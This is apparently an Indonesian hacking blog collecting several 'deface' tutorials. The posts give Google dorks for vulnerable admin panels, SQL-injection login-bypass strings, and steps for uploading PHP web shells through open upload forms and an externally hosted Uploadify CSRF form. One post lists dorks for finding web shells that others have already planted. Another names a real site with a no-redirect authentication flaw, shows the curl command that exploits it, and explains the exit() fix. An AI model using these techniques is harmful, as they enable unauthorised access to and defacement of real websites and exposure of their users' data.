Codes Xploit: deface
Showing posts with label deface. Show all posts
Showing posts with label deface. Show all posts

Tutorial Deface Metode Bypass Admin Login

 
Hallo sobat kali ini gw bakal berbagi tutorial cara deface metode bypass admin login + up shell ?? Ea ok pertama tama dorking dulu ya :"v

Dork :

inurl:/admin/login.php
inurl:/admin/dashboard.php 

Dorknya di kembangin lagi ya sobat biar dapet yang masih volos ~

Ok tahap selanjutnya slakan coba login menggunakan u/p di bawah ini :

'="or'
' or 1=1 limit 1 -- -+
' OR 1#'

Untuk selengkapnya bisa ke google aja kwkwkw ok gw disini bakal test loginya pakek '="or' . cara mengetahui website tersebut vuln ato kaga gampang coba trobos pakek 3 kode di atas aja kalo vuln bakal di redirect ke dashboard admin :"v



W bakal coba pakek '="or' 


Dan hasilnya ... 


Ya gw berhasil login sebagain administrator website tersebut.

Sekarang kita cari bagian yg bisa di gunakan untuk upload shell kita.. biasanya di bagian gallery atau slider / dll pokoknya yg bisa digunakan untuk mengupload shell.

Nih contohnya gw dapet tempat upload hehehe disini gw bakal mencoba menggunakan exitensi .php secara langsung tanpa bypass ext.


Dan apakah bisa?...


Yaps, ternyata bisa :) 

sekarang tinggal akses shell nah untuk kalian yg di pc / leptop kalian tinggal tklik kanan open newtab gambar error tersebuk nah buat kalian yg user andro kek gw ikutin cara ini !

1.Tambahkan kata view-source: pada awal url


2. Cari link yg ber-type .php
 ( sesuai yg kalian upload )

Kalo udah ketemu klik linknya !
 Dan..

Voilah shell berhasil di tanam :)

Ok sobat sekian dulu kali ini sampe ketemu di post besok ! Bay bay

Cara Deface Metode Restricted Area

 
Hae sobat2 kuh h3h3 kali ini gw bakal berbagi tutorial deface yang gampang..
ya gampang,, gampang :V LOL ok langsung aja ke tutorial :V


Dork : 
inurl:/wp intext:"area" ext:php
intext:"Restricted Area" ext:php

Kembangin ea coeg :V

Ok ciri2 vuln ya ada tempat upload kek di gambar berikut ini :
Nah Disitu kalian bisa upload shell kalian ^^ h3h3.

Akses shellnya gimana kakak? Akses Shell terdapat di direktori yang sama dengan Uploader ini dek ^^

Contoh : 
site.com/adress.php < ini vuln
akses nya gini site.com/nama_shell_ente.php < shell ente

Sekian dari gw bay bay ~

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

Cara Deface Metode Uploadify + Up Shell

 
Hallo sobat2 :"v dah lama banget ya gw ngak update tutorial deface :"v ya maklumi aja gw lagi males ngerjain tutorial yg kek gini :"v

Ok ah langsung aja 

Dork : 
inurl:/uploadify/uploadify.php
( kembangin pakek otak hentongers lo :"v )

Csrf : http://touya-niichan.cf/csrf.php 
Post : Filedata 


ok langsung aja pertama-tama ngedork dulu 


Lalu pilih web yang menurut lo vuln ( web vuln = blank page )

Lalu masukan url web vulnnya ke csrf > lock > upload deh :)


Akses shell?? inggal www.target.us/shell.php 

Abistu silakan tebas index.php nya tapi gw saranin backup dulu biar ngak terjadi masalah :')


Ok sekian dari gw semoga membantu :)

e-soft Webdesign Adminpanel Bypass

Bypass Admin di CMS e-soft :)
1. Dorking Dulu Dorknya: intext:Website Design Company : e-Soft site:.bd


2. Jika kita sudah menemukan site nya :) selanjutnya masuk ke halaman login nya :)
    Tambahkan di belakang site nya: /index.php/esoft_cms/login
Contoh: http://site.com.bd/index.php/esoft_cms/login

*Tampilan Halaman Login nya!

3.Untuk Bypass Admin nya masukan Exploit nya :)
Username/Password: 'or'1'='1

4.Jika Berhasil anda akan masuk ke halaman Administrator nya :) dan Selamat anda dapat akses sebagai admin di website tersebut :)

*Tampilan Halaman Administrator nya :)

Sekian Tutorial dari Saya dan Terima Kasih

-Mr.7z

Thx to mr.Gh0st N@0b & Myanmar Noob Hackers

Deface Metode Dorking WebShell

 


Hallo sobat :v ciee yang dateng kesini mau apa bang ? :v ini buat newbie lho bukan buat lo yang pr0 :v btw ini gw buat di hp lagi lho subuh subuh pula :v kek kata orang kalo ada ide langsung di ketik ea :v ok cukup bacot gaje nya langsung aja nih dorknya

DORK Fress :v 

  • intitle:"- phpshell" ext:php
  • inurl:/eue.php 
  • inurl:/asw.php
  • inurl:/uplo.php
  • intitle:"IndoXploit" ext:php 
  • intitle:" - c99.php" inurl:/admin
  • intitle:"Mini Shell" ext:php5
  • intitle:"AnonymousFox"
  • intitle:"B Ge Team File Manager"
  • intitle:"$$ Beby $$" ext:php
  • intitle:"404-server!!"
  • intitle:"Mister Spy"
ok ntu dia dorknya :v

sisanya tinggal ke public_html atau wwwroot atau www / web ya gitulah pokoknya lalu upload file lo deh Lalu mirrorin tinggal soof deh  kwokwokwokowkwoke :v

Jangan lupa share dan liat post post lainnya :)